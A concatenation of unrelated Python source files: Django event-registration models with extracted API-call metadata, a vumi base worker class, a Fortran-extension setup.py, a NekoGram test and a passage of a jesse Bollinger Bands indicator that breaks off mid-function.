            # Oldest registrations (lowest pk) keep their spot.
            results += self.registrations.order_by('pk')[int(self.max_registrations):]
        for question in self.eventquestion_set.all():
            for option in question.options.all():
                results += option.get_registrations_over_limit()
        return results
class EventQuestion(models.Model):
    # One configurable form question attached to an Event; rendering and
    # answer storage depend on question_type (see QUESTION_TYPES / Answer).
    event = models.ForeignKey(Event)
    name = models.CharField(max_length=64)
    question_type = models.CharField(max_length=16, choices=QUESTION_TYPES)
    required = models.BooleanField(default=False, help_text='Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen')
    radio = models.BooleanField(default=False, help_text='Voor multiple-choice/afdeling: geen dropdown maar radio buttons')
    order = models.IntegerField(default=0, help_text='Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email')
    text = models.TextField(blank=True, default='', help_text='Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige HTML attributen: class, style, a.href, a.target, img.src, img.alt')
    def __str__(self):
        return "%s (%s)" % (self.name, self.question_type)
    def form_id(self):
        # HTML element id used for this question on the registration form.
        return "q%d" % (self.id)
    def delete_event_question(self):
        # Admin list column: link to a custom delete view.
        return '<a href="/deleteEventQuestion/?optionId=%d">Delete</a>' % (self.id)
    delete_event_question.allow_tags = True
class EventOption(models.Model):
    # A selectable option for a question; its price (eurocents, may be
    # negative for a discount) is added to the registration total.
    question = models.ForeignKey('EventQuestion', related_name="options")
    name = models.CharField(max_length=200)
    price = models.IntegerField(help_text="Eurocenten", default=0)
    active = models.BooleanField(default=True)
    order = models.IntegerField(default=0)
    limit = models.IntegerField(default=0, help_text="Aantal beschikbare plekken (0 = geen limiet)")
    def __str__(self):
        # Negative price renders as a discount ("korting").
        if self.price < 0:
            return "%s: \u20AC %.2f korting" % (self.name, float(-self.price) / 100)
        if self.price > 0:
            return "%s: \u20AC %.2f" % (self.name, float(self.price) / 100)
        else:
            return "%s" % (self.name,)
    def price_str(self):
        return "\u20AC %.2f" % (float(self.price) / 100)
    def delete_event_option(self):
        # Admin list column: link to a custom delete view.
        return '<a href="/deleteEventOption/?optionId=%d">Delete</a>' % (self.id)
    delete_event_option.allow_tags = True
    def get_related_registrations(self):
        # Registrations that picked this option, oldest (lowest pk) first.
        return Registration.objects.filter(answers__option=self).order_by('pk')
    def num_registrations(self):
        registrations = self.get_related_registrations()
        return registrations.count()
    def is_full(self):
        # limit <= 0 means unlimited.
        if self.limit <= 0:
            return False
        return self.num_registrations() >= self.limit
    is_full.boolean = True
    def limit_str(self):
        # Admin display: "used/limit", or "-" when unlimited.
        if self.limit <= 0:
            return "-"
        return "{}/{}".format(self.num_registrations(), self.limit)
    limit_str.short_description = "Limit usage"
    def get_registrations_over_limit(self):
        # Registrations beyond this option's limit; earliest keep their spot.
        if self.limit <= 0:
            return []
        registrations = self.get_related_registrations()
        return registrations[int(self.limit):]
    def limit_reached(self):
        return self.is_full()
    limit_reached.boolean = True
class Registration(models.Model):
    """One person's registration for an Event, including payment state."""

    registration_date = models.DateTimeField(auto_now_add=True)
    first_name = models.CharField(max_length=64)
    last_name = models.CharField(max_length=64)
    email = models.EmailField(blank=True)
    event = models.ForeignKey(Event, related_name='registrations')
    price = models.IntegerField(default=0)
    paid = models.BooleanField(default=False)
    status = models.CharField(max_length=64, default="", blank=True)
    trxid = models.CharField(max_length=128, default="", blank=True)

    def calculate_price(self):
        """Set price to the event base price plus all chosen option prices."""
        self.price = self.event.price + sum([answer.option.price for answer in self.answers.exclude(option=None)])

    def get_options_text(self):
        """Human-readable summary of the registration, one "label: value"
        line per field, in the event's question order."""
        results = []
        added_default_fields = False
        answers = {a.question: a.get_answer() for a in self.answers.all()}
        for question in self.event.eventquestion_set.order_by('order'):
            # The built-in name/email fields are inserted just before the
            # first question with order >= 0.
            if question.order >= 0 and not added_default_fields:
                results += ["Voornaam: {}".format(self.first_name)]
                results += ["Achternaam: {}".format(self.last_name)]
                results += ["Email: {}".format(self.email)]
                added_default_fields = True
            if question in answers:
                results += ["{}: {}".format(question.name, answers[question])]
        if not added_default_fields:
            results += ["Voornaam: {}".format(self.first_name)]
            results += ["Achternaam: {}".format(self.last_name)]
            results += ["Email: {}".format(self.email)]
        return '\n'.join(results)

    def __str__(self):
        return "%s %s - %s - %s" % (self.first_name, self.last_name, self.event, str(self.price))

    def gen_subscription_id(self):
        """Build a payment/subscription id: "<pk>x<sanitised suffix>".

        Bug fix: ``filter(...)`` returns an iterator on Python 3, so the
        original ``filter(...)[:n]`` slice (and the str concatenation)
        raised TypeError; the sanitising is now done with a join.
        NOTE(review): ``get_options_name`` is not defined on this model in
        this file — confirm it exists elsewhere or should be
        ``get_options_text``.
        """
        num_id = str(self.id)
        safe = set("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789")
        sanitised = "".join(c for c in self.get_options_name() if c in safe)
        return num_id + "x" + sanitised[:15 - len(num_id)]

    def send_confirmation_email(self):
        """Render the event's confirmation template and email it.

        Returns the rendered body; send failures are logged and re-raised.
        """
        t = Template(self.event.email_template)
        c = Context({
            "voornaam": self.first_name,
            "achternaam": self.last_name,
            "inschrijf_opties": self.get_options_text(),
        })
        rendered_mail = t.render(c)
        email = EmailMessage(
            subject="Inschrijfbevestiging: %s" % (self.event.name),
            body=rendered_mail,
            from_email=self.event.contact_email,
            to=[self.email],
        )
        try:
            email.send()
        except Exception:
            # Narrowed from a bare ``except:`` so KeyboardInterrupt /
            # SystemExit are not caught; the error is still re-raised.
            logger.error("Could not send welcome mail to %s", self.email)
            logger.error(traceback.format_exc())
            raise
        return rendered_mail
class Answer(models.Model):
    # This should maybe be a "through" model
    # Stores one registrant's answer to one EventQuestion; which field
    # holds the value depends on question.question_type.
    registration = models.ForeignKey(Registration, related_name='answers')
    question = models.ForeignKey(EventQuestion)
    int_field = models.IntegerField(default=0, null=True)
    txt_field = models.CharField(max_length=256, blank=True)
    bool_field = models.BooleanField(default=False)
    option = models.ForeignKey(EventOption, default=None, null=True, blank=True)
    def __str__(self):
        return "%s - %s" % (self.question, self.get_answer())
    def set_answer(self, ans):
        # Route the value into the field that matches the question type.
        if self.question.question_type == "INT":
            self.int_field = ans
        elif self.question.question_type == "TXT":
            self.txt_field = ans
        elif self.question.question_type == "AFD":
            # Stores the branch code; get_answer() maps it to a name.
            self.txt_field = ans
        elif self.question.question_type == "BOOL":
            self.bool_field = ans
            # A checked BOOL links the question's (single) option so its
            # price is included; unchecked clears the link.
            if self.bool_field and len(self.question.options.all()):
                self.option = self.question.options.all()[0]
            else:
                self.option = None
        elif self.question.question_type == "CHOICE":
            self.option = ans
    def get_answer(self):
        # Inverse of set_answer(); returns None for unhandled types
        # (e.g. "TEXT", which has no stored value).
        if self.question.question_type == "INT":
            return self.int_field
        elif self.question.question_type == "TXT":
            return self.txt_field
        elif self.question.question_type == "AFD":
            return afdeling_text(self.txt_field)
        elif self.question.question_type == "BOOL":
            if self.option is not None:
                return self.option
            else:
                return self.bool_field and 'Ja' or 'Nee'
        elif self.question.question_type == "CHOICE":
            return self.option
| [
"logging.getLogger",
"django.db.models.EmailField",
"traceback.format_exc",
"django.db.models.TextField",
"django.db.models.IntegerField",
"django.db.models.ForeignKey",
"django.template.Template",
"django.db.models.BooleanField",
"datetime.datetime.now",
"django.db.models.SlugField",
"django.db... | [((965, 992), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (982, 992), False, 'import logging\n'), ((1677, 1709), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (1693, 1709), False, 'from django.db import models\n'), ((1721, 1739), 'django.db.models.SlugField', 'models.SlugField', ([], {}), '()\n', (1737, 1739), False, 'from django.db import models\n'), ((1765, 1787), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (1785, 1787), False, 'from django.db import models\n'), ((1811, 1833), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {}), '()\n', (1831, 1833), False, 'from django.db import models\n'), ((1852, 1870), 'django.db.models.TextField', 'models.TextField', ([], {}), '()\n', (1868, 1870), False, 'from django.db import models\n'), ((1891, 1910), 'django.db.models.EmailField', 'models.EmailField', ([], {}), '()\n', (1908, 1910), False, 'from django.db import models\n'), ((1932, 2038), 'django.db.models.TextField', 'models.TextField', ([], {'help_text': '"""Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}"""'}), "(help_text=\n 'Enkele placeholders: {{voornaam}}, {{achternaam}}, {{inschrijf_opties}}')\n", (1948, 2038), False, 'from django.db import models\n'), ((2046, 2100), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'help_text': '"""Eurocenten"""', 'default': '(0)'}), "(help_text='Eurocenten', default=0)\n", (2065, 2100), False, 'from django.db import models\n'), ((2125, 2230), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'help_text': '"""Als groter dan 0, bepaalt maximaal aantal inschrijvingen"""'}), "(default=0, help_text=\n 'Als groter dan 0, bepaalt maximaal aantal inschrijvingen')\n", (2144, 2230), False, 'from django.db import models\n'), ((3973, 3997), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Event'], {}), '(Event)\n', 
(3990, 3997), False, 'from django.db import models\n'), ((4009, 4040), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (4025, 4040), False, 'from django.db import models\n'), ((4061, 4116), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(16)', 'choices': 'QUESTION_TYPES'}), '(max_length=16, choices=QUESTION_TYPES)\n', (4077, 4116), False, 'from django.db import models\n'), ((4132, 4248), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen"""'}), "(default=False, help_text=\n 'Bij Ja/Nee: verplicht aanvinken; bij andere: verplicht invullen')\n", (4151, 4248), False, 'from django.db import models\n'), ((4256, 4372), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Voor multiple-choice/afdeling: geen dropdown maar radio buttons"""'}), "(default=False, help_text=\n 'Voor multiple-choice/afdeling: geen dropdown maar radio buttons')\n", (4275, 4372), False, 'from django.db import models\n'), ((4380, 4536), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'help_text': '"""Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email"""'}), "(default=0, help_text=\n 'Bepaalt volgorde op formulier; gebruik order<0 voor elementen vooraf aan voornaam, achternaam en email'\n )\n", (4399, 4536), False, 'from django.db import models\n'), ((4538, 4765), 'django.db.models.TextField', 'models.TextField', ([], {'blank': '(True)', 'default': '""""""', 'help_text': '"""Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige HTML attributen: class, style, a.href, a.target, img.src, img.alt"""'}), '(blank=True, default=\'\', help_text=\n \'Voor "HTML Text"; geldige HTML tags: a, b/strong, code, em/i, h3, img, ul, ol, li, p, br; Geldige 
HTML attributen: class, style, a.href, a.target, img.src, img.alt\'\n )\n', (4554, 4765), False, 'from django.db import models\n'), ((5112, 5170), 'django.db.models.ForeignKey', 'models.ForeignKey', (['"""EventQuestion"""'], {'related_name': '"""options"""'}), "('EventQuestion', related_name='options')\n", (5129, 5170), False, 'from django.db import models\n'), ((5182, 5214), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)'}), '(max_length=200)\n', (5198, 5214), False, 'from django.db import models\n'), ((5227, 5281), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'help_text': '"""Eurocenten"""', 'default': '(0)'}), "(help_text='Eurocenten', default=0)\n", (5246, 5281), False, 'from django.db import models\n'), ((5295, 5328), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)'}), '(default=True)\n', (5314, 5328), False, 'from django.db import models\n'), ((5341, 5371), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (5360, 5371), False, 'from django.db import models\n'), ((5384, 5477), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'help_text': '"""Aantal beschikbare plekken (0 = geen limiet)"""'}), "(default=0, help_text=\n 'Aantal beschikbare plekken (0 = geen limiet)')\n", (5403, 5477), False, 'from django.db import models\n'), ((6961, 7000), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'auto_now_add': '(True)'}), '(auto_now_add=True)\n', (6981, 7000), False, 'from django.db import models\n'), ((7018, 7049), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (7034, 7049), False, 'from django.db import models\n'), ((7066, 7097), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)'}), '(max_length=64)\n', (7082, 7097), False, 'from django.db import models\n'), ((7110, 7139), 'django.db.models.EmailField', 
'models.EmailField', ([], {'blank': '(True)'}), '(blank=True)\n', (7127, 7139), False, 'from django.db import models\n'), ((7152, 7206), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Event'], {'related_name': '"""registrations"""'}), "(Event, related_name='registrations')\n", (7169, 7206), False, 'from django.db import models\n'), ((7219, 7249), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)'}), '(default=0)\n', (7238, 7249), False, 'from django.db import models\n'), ((7261, 7295), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (7280, 7295), False, 'from django.db import models\n'), ((7309, 7364), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(64)', 'default': '""""""', 'blank': '(True)'}), "(max_length=64, default='', blank=True)\n", (7325, 7364), False, 'from django.db import models\n'), ((7377, 7433), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(128)', 'default': '""""""', 'blank': '(True)'}), "(max_length=128, default='', blank=True)\n", (7393, 7433), False, 'from django.db import models\n'), ((9707, 9762), 'django.db.models.ForeignKey', 'models.ForeignKey', (['Registration'], {'related_name': '"""answers"""'}), "(Registration, related_name='answers')\n", (9724, 9762), False, 'from django.db import models\n'), ((9778, 9810), 'django.db.models.ForeignKey', 'models.ForeignKey', (['EventQuestion'], {}), '(EventQuestion)\n', (9795, 9810), False, 'from django.db import models\n'), ((9827, 9868), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'default': '(0)', 'null': '(True)'}), '(default=0, null=True)\n', (9846, 9868), False, 'from django.db import models\n'), ((9885, 9929), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(256)', 'blank': '(True)'}), '(max_length=256, blank=True)\n', (9901, 9929), False, 'from django.db import models\n'), ((9947, 9981), 
'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)'}), '(default=False)\n', (9966, 9981), False, 'from django.db import models\n'), ((9995, 10062), 'django.db.models.ForeignKey', 'models.ForeignKey', (['EventOption'], {'default': 'None', 'null': '(True)', 'blank': '(True)'}), '(EventOption, default=None, null=True, blank=True)\n', (10012, 10062), False, 'from django.db import models\n'), ((3103, 3126), 'datetime.datetime.now', 'datetime.datetime.now', ([], {}), '()\n', (3124, 3126), False, 'import datetime\n'), ((8923, 8958), 'django.template.Template', 'Template', (['self.event.email_template'], {}), '(self.event.email_template)\n', (8931, 8958), False, 'from django.template import Context, Template\n'), ((9184, 9329), 'django.core.mail.EmailMessage', 'EmailMessage', ([], {'subject': "('Inschrijfbevestiging: %s' % self.event.name)", 'body': 'rendered_mail', 'from_email': 'self.event.contact_email', 'to': '[self.email]'}), "(subject='Inschrijfbevestiging: %s' % self.event.name, body=\n rendered_mail, from_email=self.event.contact_email, to=[self.email])\n", (9196, 9329), False, 'from django.core.mail import EmailMessage\n'), ((9542, 9564), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (9562, 9564), False, 'import traceback\n')] |
# -*- test-case-name: vumi.tests.test_worker -*-
"""Basic tools for workers that handle TransportMessages."""
import time
import os
import socket
from twisted.internet.defer import (
inlineCallbacks, succeed, maybeDeferred, gatherResults)
from twisted.python import log
from vumi.service import Worker
from vumi.middleware import setup_middlewares_from_config
from vumi.connectors import ReceiveInboundConnector, ReceiveOutboundConnector
from vumi.config import Config, ConfigInt
from vumi.errors import DuplicateConnectorError
from vumi.utils import generate_worker_id
from vumi.blinkenlights.heartbeat import (HeartBeatPublisher,
HeartBeatMessage)
def then_call(d, func, *args, **kw):
    """Chain ``func(*args, **kw)`` onto deferred ``d``, discarding the
    previous callback result, and return the deferred chain."""
    def _fire(_ignored_result):
        return func(*args, **kw)
    return d.addCallback(_fire)
class BaseConfig(Config):
    """Base config definition for workers.
    You should subclass this and add worker-specific fields.
    """
    # static=True: read once when the worker starts, not per-message.
    amqp_prefetch_count = ConfigInt(
        "The number of messages fetched concurrently from each AMQP queue"
        " by each worker instance.",
        default=20, static=True)
class BaseWorker(Worker):
    """Base class for a message processing worker.
    This contains common functionality used by application, transport and
    dispatcher workers. It should be subclassed by workers that need to
    manage their own connectors.
    """
    CONFIG_CLASS = BaseConfig
    def __init__(self, options, config=None):
        super(BaseWorker, self).__init__(options, config=config)
        # connector name -> connector instance; populated by setup_connector().
        self.connectors = {}
        # middleware instances, in setup order; torn down in reverse.
        self.middlewares = []
        self._static_config = self.CONFIG_CLASS(self.config, static=True)
        self._hb_pub = None
        self._worker_id = None
    def startWorker(self):
        """Run the worker start-up sequence as a deferred chain:
        validate config, then heartbeat, middleware, connectors, worker."""
        log.msg('Starting a %s worker with config: %s'
                % (self.__class__.__name__, self.config))
        d = maybeDeferred(self._validate_config)
        then_call(d, self.setup_heartbeat)
        then_call(d, self.setup_middleware)
        then_call(d, self.setup_connectors)
        then_call(d, self.setup_worker)
        return d
    def stopWorker(self):
        """Tear everything down in the reverse order of startWorker()."""
        log.msg('Stopping a %s worker.' % (self.__class__.__name__,))
        d = succeed(None)
        then_call(d, self.teardown_worker)
        then_call(d, self.teardown_connectors)
        then_call(d, self.teardown_middleware)
        then_call(d, self.teardown_heartbeat)
        return d
    def setup_connectors(self):
        # Subclasses must create their connectors here.
        raise NotImplementedError()
    @inlineCallbacks
    def setup_heartbeat(self):
        """Start the heartbeat publisher if a worker_name is configured."""
        # Disable heartbeats if worker_name is not set. We're
        # currently using it as the primary identifier for a worker
        if 'worker_name' in self.config:
            self._worker_name = self.config.get("worker_name")
            self._system_id = self.options.get("system-id", "global")
            self._worker_id = generate_worker_id(self._system_id,
                                                 self._worker_name)
            log.msg("Starting HeartBeat publisher with worker_name=%s"
                    % self._worker_name)
            self._hb_pub = yield self.start_publisher(HeartBeatPublisher,
                                                       self._gen_heartbeat_attrs)
        else:
            log.msg("HeartBeat publisher disabled. No worker_id "
                    "field found in config.")
    def teardown_heartbeat(self):
        """Stop the heartbeat publisher if one was started."""
        if self._hb_pub is not None:
            self._hb_pub.stop()
            self._hb_pub = None
    def _gen_heartbeat_attrs(self):
        """Build the attribute dict published with each heartbeat message."""
        # worker_name is guaranteed to be set here, otherwise this func would
        # not have been called
        attrs = {
            'version': HeartBeatMessage.VERSION_20130319,
            'worker_id': self._worker_id,
            'system_id': self._system_id,
            'worker_name': self._worker_name,
            'hostname': socket.gethostname(),
            'timestamp': time.time(),
            'pid': os.getpid(),
        }
        attrs.update(self.custom_heartbeat_attrs())
        return attrs
    def custom_heartbeat_attrs(self):
        """Worker subclasses can override this to add custom attributes"""
        return {}
    def teardown_connectors(self):
        """Tear down every registered connector, one at a time."""
        d = succeed(None)
        for connector_name in self.connectors.keys():
            then_call(d, self.teardown_connector, connector_name)
        return d
    def setup_worker(self):
        # Subclasses perform worker-specific start-up here.
        raise NotImplementedError()
    def teardown_worker(self):
        # Subclasses perform worker-specific shutdown here.
        raise NotImplementedError()
    def setup_middleware(self):
        """Create middlewares from config."""
        d = setup_middlewares_from_config(self, self.config)
        d.addCallback(self.middlewares.extend)
        return d
    def teardown_middleware(self):
        """Teardown middlewares."""
        # Reverse order so the first middleware set up is the last torn down.
        d = succeed(None)
        for mw in reversed(self.middlewares):
            then_call(d, mw.teardown_middleware)
        return d
    def get_static_config(self):
        """Return static (message independent) configuration."""
        return self._static_config
    def get_config(self, msg, ctxt=None):
        """This should return a message and context specific config object.
        It deliberately returns a deferred even when this isn't strictly
        necessary to ensure that workers will continue to work when per-message
        configuration needs to be fetched from elsewhere.
        """
        return succeed(self.CONFIG_CLASS(self.config))
    def _validate_config(self):
        """Once subclasses call `super().validate_config` properly,
        this method can be removed.
        """
        # TODO: remove this once all uses of validate_config have been fixed.
        self.validate_config()
    def validate_config(self):
        """
        Application-specific config validation happens in here.
        Subclasses may override this method to perform extra config
        validation.
        """
        # TODO: deprecate this in favour of a similar method on
        # config classes.
        pass
    def setup_connector(self, connector_cls, connector_name, middleware=False):
        """Create, register and set up a connector; returns a deferred that
        fires with the connector instance."""
        if connector_name in self.connectors:
            raise DuplicateConnectorError("Attempt to add duplicate connector"
                                          " with name %r" % (connector_name,))
        prefetch_count = self.get_static_config().amqp_prefetch_count
        middlewares = self.middlewares if middleware else None
        connector = connector_cls(self, connector_name,
                                  prefetch_count=prefetch_count,
                                  middlewares=middlewares)
        self.connectors[connector_name] = connector
        d = connector.setup()
        d.addCallback(lambda r: connector)
        return d
    def teardown_connector(self, connector_name):
        """Unregister and tear down a connector; returns a deferred that
        fires with the removed connector instance."""
        connector = self.connectors.pop(connector_name)
        d = connector.teardown()
        d.addCallback(lambda r: connector)
        return d
    def setup_ri_connector(self, connector_name, middleware=True):
        """Convenience wrapper: set up a receive-inbound connector."""
        return self.setup_connector(ReceiveInboundConnector, connector_name,
                                    middleware=middleware)
    def setup_ro_connector(self, connector_name, middleware=True):
        """Convenience wrapper: set up a receive-outbound connector."""
        return self.setup_connector(ReceiveOutboundConnector, connector_name,
                                    middleware=middleware)
    def pause_connectors(self):
        """Pause all connectors; returns a deferred firing when all are paused."""
        return gatherResults([
            connector.pause() for connector in self.connectors.itervalues()])
    def unpause_connectors(self):
        """Resume message delivery on all connectors."""
        for connector in self.connectors.itervalues():
            connector.unpause()
| [
"twisted.python.log.msg",
"twisted.internet.defer.maybeDeferred",
"vumi.config.ConfigInt",
"vumi.middleware.setup_middlewares_from_config",
"vumi.errors.DuplicateConnectorError",
"vumi.utils.generate_worker_id",
"time.time",
"os.getpid",
"socket.gethostname",
"twisted.internet.defer.succeed"
] | [((961, 1098), 'vumi.config.ConfigInt', 'ConfigInt', (['"""The number of messages fetched concurrently from each AMQP queue by each worker instance."""'], {'default': '(20)', 'static': '(True)'}), "(\n 'The number of messages fetched concurrently from each AMQP queue by each worker instance.'\n , default=20, static=True)\n", (970, 1098), False, 'from vumi.config import Config, ConfigInt\n'), ((1755, 1847), 'twisted.python.log.msg', 'log.msg', (["('Starting a %s worker with config: %s' % (self.__class__.__name__, self.\n config))"], {}), "('Starting a %s worker with config: %s' % (self.__class__.__name__,\n self.config))\n", (1762, 1847), False, 'from twisted.python import log\n'), ((1872, 1908), 'twisted.internet.defer.maybeDeferred', 'maybeDeferred', (['self._validate_config'], {}), '(self._validate_config)\n', (1885, 1908), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((2132, 2193), 'twisted.python.log.msg', 'log.msg', (["('Stopping a %s worker.' % (self.__class__.__name__,))"], {}), "('Stopping a %s worker.' 
% (self.__class__.__name__,))\n", (2139, 2193), False, 'from twisted.python import log\n'), ((2206, 2219), 'twisted.internet.defer.succeed', 'succeed', (['None'], {}), '(None)\n', (2213, 2219), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((4234, 4247), 'twisted.internet.defer.succeed', 'succeed', (['None'], {}), '(None)\n', (4241, 4247), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((4609, 4657), 'vumi.middleware.setup_middlewares_from_config', 'setup_middlewares_from_config', (['self', 'self.config'], {}), '(self, self.config)\n', (4638, 4657), False, 'from vumi.middleware import setup_middlewares_from_config\n'), ((4806, 4819), 'twisted.internet.defer.succeed', 'succeed', (['None'], {}), '(None)\n', (4813, 4819), False, 'from twisted.internet.defer import inlineCallbacks, succeed, maybeDeferred, gatherResults\n'), ((2876, 2930), 'vumi.utils.generate_worker_id', 'generate_worker_id', (['self._system_id', 'self._worker_name'], {}), '(self._system_id, self._worker_name)\n', (2894, 2930), False, 'from vumi.utils import generate_worker_id\n'), ((2992, 3071), 'twisted.python.log.msg', 'log.msg', (["('Starting HeartBeat publisher with worker_name=%s' % self._worker_name)"], {}), "('Starting HeartBeat publisher with worker_name=%s' % self._worker_name)\n", (2999, 3071), False, 'from twisted.python import log\n'), ((3267, 3343), 'twisted.python.log.msg', 'log.msg', (['"""HeartBeat publisher disabled. No worker_id field found in config."""'], {}), "('HeartBeat publisher disabled. 
No worker_id field found in config.')\n", (3274, 3343), False, 'from twisted.python import log\n'), ((3879, 3899), 'socket.gethostname', 'socket.gethostname', ([], {}), '()\n', (3897, 3899), False, 'import socket\n'), ((3926, 3937), 'time.time', 'time.time', ([], {}), '()\n', (3935, 3937), False, 'import time\n'), ((3958, 3969), 'os.getpid', 'os.getpid', ([], {}), '()\n', (3967, 3969), False, 'import os\n'), ((6191, 6289), 'vumi.errors.DuplicateConnectorError', 'DuplicateConnectorError', (["('Attempt to add duplicate connector with name %r' % (connector_name,))"], {}), "('Attempt to add duplicate connector with name %r' %\n (connector_name,))\n", (6214, 6289), False, 'from vumi.errors import DuplicateConnectorError\n')] |
# setup.py
# This script will build the main subpackages
# See LICENSE for details
from __future__ import print_function, absolute_import
from numpy.distutils.misc_util import Configuration
from os.path import join
# Locations of the Fortran source trees, relative to this setup script.
TTFORT_DIR = '../tt-fort'
EXPM_DIR = '../tt-fort/expm'
# Expokit (matrix exponential) sources, compiled into the 'expokit' library.
EXPOKIT_SRC = [
    'explib.f90',
    'normest.f90',
    'expokit.f',
    'dlacn1.f',
    'dlapst.f',
    'dlarpc.f',
    'zlacn1.f',
    ]
# Dynamical TT/KSL integrator sources, built into the 'dyn_tt' extension.
TTKSL_SRC = [
    'ttals.f90',
    'tt_ksl.f90',
    'tt_diag_ksl.f90'
    ]
def configuration(parent_package='', top_path=None):
    """Assemble the numpy.distutils configuration for the ``ksl`` subpackage."""
    expokit_sources = []
    for fname in EXPOKIT_SRC:
        expokit_sources.append(join(EXPM_DIR, fname))
    ksl_sources = [join(TTFORT_DIR, fname) for fname in TTKSL_SRC] + ['tt_ksl.pyf']
    cfg = Configuration('ksl', parent_package, top_path)
    # Fortran helper library for the matrix-exponential routines.
    cfg.add_library('expokit', sources=expokit_sources)
    shared_names = ['print_lib', 'expokit', 'mytt']
    cfg.add_extension(
        'dyn_tt',
        sources=ksl_sources,
        depends=list(shared_names),
        libraries=shared_names,
    )
    return cfg
if __name__ == '__main__':
    # This module is meant to be consumed by the top-level setup.py,
    # not executed directly.
    print('This is the wrong setup.py to run')
| [
"os.path.join",
"numpy.distutils.misc_util.Configuration"
] | [((711, 757), 'numpy.distutils.misc_util.Configuration', 'Configuration', (['"""ksl"""', 'parent_package', 'top_path'], {}), "('ksl', parent_package, top_path)\n", (724, 757), False, 'from numpy.distutils.misc_util import Configuration\n'), ((564, 581), 'os.path.join', 'join', (['EXPM_DIR', 'x'], {}), '(EXPM_DIR, x)\n', (568, 581), False, 'from os.path import join\n'), ((622, 641), 'os.path.join', 'join', (['TTFORT_DIR', 'x'], {}), '(TTFORT_DIR, x)\n', (626, 641), False, 'from os.path import join\n')] |
from NekoGram import Neko, Bot
import json
def test_json_text_processor():
    """A raw JSON string added via add_texts is stored parsed, per language."""
    raw_json = '{"x": {"text": "hello"} }'
    bot = Bot(token='0:0', validate_token=False)
    neko = Neko(bot=bot, validate_text_names=False)
    neko.add_texts(texts=raw_json, lang='en')
    assert neko.texts['en'] == json.loads(raw_json)
| [
"NekoGram.Bot",
"json.loads"
] | [((284, 304), 'json.loads', 'json.loads', (['raw_json'], {}), '(raw_json)\n', (294, 304), False, 'import json\n'), ((97, 135), 'NekoGram.Bot', 'Bot', ([], {'token': '"""0:0"""', 'validate_token': '(False)'}), "(token='0:0', validate_token=False)\n", (100, 135), False, 'from NekoGram import Neko, Bot\n')] |
from collections import namedtuple
import numpy as np
import talib
from jesse.indicators.ma import ma
from jesse.indicators.mean_ad import mean_ad
from jesse.indicators.median_ad import median_ad
from jesse.helpers import get_candle_source, slice_candles
# Result container: each field is a scalar, or an array when sequential=True.
BollingerBands = namedtuple('BollingerBands', ['upperband', 'middleband', 'lowerband'])
def bollinger_bands(candles: np.ndarray, period: int = 20, devup: float = 2, devdn: float = 2, matype: int = 0, devtype: int = 0,
                    source_type: str = "close",
                    sequential: bool = False) -> BollingerBands:
    """
    BBANDS - Bollinger Bands

    :param candles: np.ndarray
    :param period: int - default: 20
    :param devup: float - default: 2 (upper band width, in deviations)
    :param devdn: float - default: 2 (lower band width, in deviations)
    :param matype: int - default: 0 (moving-average type forwarded to ``ma``)
    :param devtype: int - default: 0 (0 = standard deviation,
        1 = mean absolute deviation, 2 = median absolute deviation)
    :param source_type: str - default: "close"
    :param sequential: bool - default=False

    :return: BollingerBands(upperband, middleband, lowerband)
    :raises ValueError: if ``devtype`` is not 0, 1 or 2
    """
    candles = slice_candles(candles, sequential)
    source = get_candle_source(candles, source_type=source_type)
    if devtype == 0:
        dev = talib.STDDEV(source, period)
    elif devtype == 1:
        dev = mean_ad(source, period, sequential=True)
    elif devtype == 2:
        dev = median_ad(source, period, sequential=True)
    else:
        # Previously an unknown devtype crashed later with an opaque
        # NameError (``dev`` never assigned); fail fast and explicitly.
        raise ValueError(
            "devtype must be 0 (stddev), 1 (mean AD) or 2 (median AD), got: {}".format(devtype))
